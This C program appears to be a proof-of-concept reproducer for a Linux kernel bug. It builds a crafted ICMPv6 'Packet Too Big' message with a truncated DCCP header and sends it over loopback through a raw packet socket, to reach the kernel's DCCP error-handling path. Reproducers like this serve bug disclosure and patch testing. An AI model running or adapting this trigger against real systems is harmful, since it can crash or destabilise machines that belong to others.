#define _GNU_SOURCE
#include <stddef.h>
#include <err.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/icmpv6.h>
#include <linux/ipv6.h>
#include <linux/udp.h>
#include <linux/dccp.h>
#include <linux/if_ether.h>
#include <linux/tcp.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

uint32_t ip_checksum_partial(void *buf, int len) {
  int count = len;
  uint32_t res = 0;
  while (count > 1) {
    res += *(uint16_t*)buf;
    buf += 2;
    count -= 2;
  }
  if (count > 0) res += *(uint8_t*)buf;
  return res;
}
uint16_t ip_checksum_fold(uint32_t res) {
  while (res > 0xffff)
    res = (res & 0xffff) + (res >> 16);
  return ~res;
}

uint32_t pseudo_checksum(struct ipv6hdr *ip, uint32_t upper_layer_length) {
  struct {
    struct in6_addr saddr;
    struct in6_addr daddr;
    uint32_t upper_layer_length;
    char zeroes[3];
    uint8_t nexthdr;
  } pseudo_header = {
    .saddr = ip->saddr,
    .daddr = ip->daddr,
    .upper_layer_length = htonl(upper_layer_length),
    .nexthdr = ip->nexthdr
  };
  return ip_checksum_partial(&pseudo_header, sizeof(pseudo_header));
}

int main(void) {
  unsigned int ifindex = if_nametoindex("lo");
  if (ifindex == 0)
    errx(1, "unable to resolve interface name");

  /* enable the static key udpv6_encap_needed_key to make the path hittable */
  int encap_dummy_sock = SYSCHK(socket(AF_INET6, SOCK_DGRAM, 0));
  int ONE = 1;
  SYSCHK(setsockopt(encap_dummy_sock, IPPROTO_UDP, UDP_GRO, &ONE, sizeof(ONE)));

  int rawsock = SYSCHK(socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_IP)));

  /* set up a connected pair of server and client sockets */
  int listen_sock = SYSCHK(socket(AF_INET6, SOCK_DCCP, IPPROTO_DCCP));
  int client_sock = SYSCHK(socket(AF_INET6, SOCK_DCCP, IPPROTO_DCCP));
  struct sockaddr_in6 connect_addr = {
    .sin6_family = AF_INET6,
    .sin6_port = htons(4321),
    .sin6_addr = IN6ADDR_LOOPBACK_INIT
  };
  SYSCHK(bind(listen_sock, (struct sockaddr *)&connect_addr, sizeof(connect_addr)));
  SYSCHK(listen(listen_sock, 1));
  SYSCHK(connect(client_sock, (struct sockaddr *)&connect_addr, sizeof(connect_addr)));
  struct sockaddr_in6 client_addr;
  socklen_t client_addr_len = sizeof(client_addr);
  int server_sock = SYSCHK(accept(listen_sock, &client_addr, &client_addr_len));

  struct packet {
    struct ipv6hdr ip;
    struct icmp6hdr icmp;
    struct ipv6hdr ip2;
    struct dccp_hdr dccp;
  } packet = {
    .ip = {
      .version = 6,
      .priority = 0,
      .payload_len = htons(sizeof(packet)-offsetof(struct packet, icmp)),
      .nexthdr = IPPROTO_ICMPV6,
      .hop_limit = 255,
      .saddr = IN6ADDR_LOOPBACK_INIT,
      .daddr = IN6ADDR_LOOPBACK_INIT
    },
    .icmp = {
      .icmp6_type = ICMPV6_PKT_TOOBIG,
      .icmp6_code = 0,
      .icmp6_cksum = 0/*fixed up below*/
    },
    .ip2 = {
      .version = 6,
      .priority = 0,
      .payload_len = htons(sizeof(packet)-offsetof(struct packet, dccp)),
      .nexthdr = IPPROTO_DCCP,
      .hop_limit = 255,
      .saddr = IN6ADDR_LOOPBACK_INIT,
      .daddr = IN6ADDR_LOOPBACK_INIT
    },
    .dccp = {
      .dccph_sport = htons(4321),
      .dccph_dport = client_addr.sin6_port,
      /* signals the existence of more sequence number data after dccp_hdr */
      .dccph_x = 1,
      .dccph_seq = 0x1111
    }
  };
  packet.icmp.icmp6_cksum = ip_checksum_fold(
      pseudo_checksum(&packet.ip, sizeof(packet)-offsetof(struct packet, icmp)) +
      ip_checksum_partial(&packet.icmp, sizeof(packet)-offsetof(struct packet, icmp))
  );

  unsigned int recheck_checksum = ip_checksum_fold(
      pseudo_checksum(&packet.ip, sizeof(packet)-offsetof(struct packet, icmp)) +
      ip_checksum_partial(&packet.icmp, sizeof(packet)-offsetof(struct packet, icmp))
  );
  printf("recheck checksum (should be 0): 0x%x\n", recheck_checksum);
  struct sockaddr_ll dest_addr_packet_sock = {
    .sll_family = AF_PACKET,
    .sll_protocol = htons(ETH_P_IPV6),
    .sll_ifindex = ifindex,
    .sll_hatype = ARPHRD_ETHER,
    .sll_halen = 6,
    /* zeroed 6-byte target MAC address (sll_addr) */
  };
  SYSCHK(sendto(rawsock, &packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr_packet_sock, sizeof(dest_addr_packet_sock)));
}
